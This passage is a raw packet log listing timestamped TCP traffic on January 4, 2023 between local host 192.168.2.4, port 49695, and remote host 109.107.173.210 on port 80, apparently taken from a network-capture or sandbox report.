Jan 4, 2023 16:47:23.939327955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939333916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939378023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939378977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939421892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939428091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939474106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939480066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939517975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939521074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939565897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939569950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939615965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939616919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939665079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939697027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939712048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939713001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939758062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939758062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939805984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939805984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939852953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939858913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939898014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939919949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939944029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939948082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.939991951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.939995050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940048933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940108061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940155029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940155983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940157890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940155983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940202951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940203905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940247059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940253019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940299988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940303087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940342903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940347910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940392017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940396070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940439939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940443039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940493107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940493107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940540075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940541983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940587044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940589905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940634012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940638065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940682888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940685034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940727949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940732956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940779924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940798044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940825939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940853119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940869093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940875053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940921068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940923929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.940970898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.940972090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941016912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941021919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941067934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941068888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941113949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941118956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941164970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941167116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941210985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941214085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941257954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941261053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941308022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941308022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941359043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941359043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941401958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941407919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941452980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941453934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941500902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941504002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941546917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941551924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941596985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941598892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941641092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941651106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941699028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941699982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941750050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941750050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941795111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941807985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941829920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941854954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941875935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941878080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941924095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.941929102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941963911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.941992998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942011118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942035913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942056894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942058086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942106009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942114115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942147017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942152977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942198038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942199945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942251921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942254066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942296028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942301989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942349911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942363977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942404032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942406893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942428112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942470074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942478895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942496061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942528009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942545891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942573071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942601919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942647934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942791939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942843914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942852020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942889929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942892075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942941904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.942967892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942990065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.942991018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.943037987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.943041086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.943088055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.943088055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.943131924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.943135977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.943181038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.943183899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.943228960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969676018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969732046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969765902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969784021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969803095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969834089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969835043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969834089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969872952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969881058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969897985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969913006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969913960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969940901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969952106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.969964981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.969989061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970011950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970042944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970046043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970062971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970088005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970097065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970122099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970141888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970155001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970176935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970196009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970218897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970230103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970244884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970263958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970297098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970298052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970324993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970344067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970356941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970369101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970371962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970396042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970428944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970432997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970432997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970462084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970475912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970489025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970494032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970511913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970525026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970526934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970551968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970558882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970590115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970593929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970627069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970648050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970659971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970676899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970720053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970753908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970773935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970787048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970793962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970817089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970825911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970843077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970864058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970880032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970880985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970916033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970925093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970949888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970971107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.970983982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.970997095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971018076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971031904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971051931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971086979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971103907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971126080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971126080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971138000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971147060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971168041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971172094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971191883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971205950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971235037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971240997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971255064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971273899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971306086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971307039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971326113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971344948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971371889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971379995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971404076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971415043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971448898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971451044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971474886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971493959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971506119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971515894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971524954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971539974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971559048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971564054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971582890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971605062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971627951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971651077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971661091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971684933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971694946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971708059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971741915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971748114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971759081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971790075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971802950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971803904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971816063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971838951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971852064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971859932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971884012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971887112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971904993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971930027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971936941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971961975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.971981049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.971995115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972013950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972028971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972057104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972063065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972090006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972100019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972126961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972134113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972162008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972168922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972193956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972203970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972227097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972237110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972261906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972271919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972296000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972306967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972336054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972342968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972362995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972378016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972402096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972412109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972438097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972446918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972470999 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972481012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972505093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972513914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972548008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972548962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972568035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972582102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972603083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972616911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972632885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972651958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972665071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972685099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972701073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972717047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972733021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972750902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972764969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.972784996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.972800016 CET	49695	80	192.168.2.4	109.107.173.210
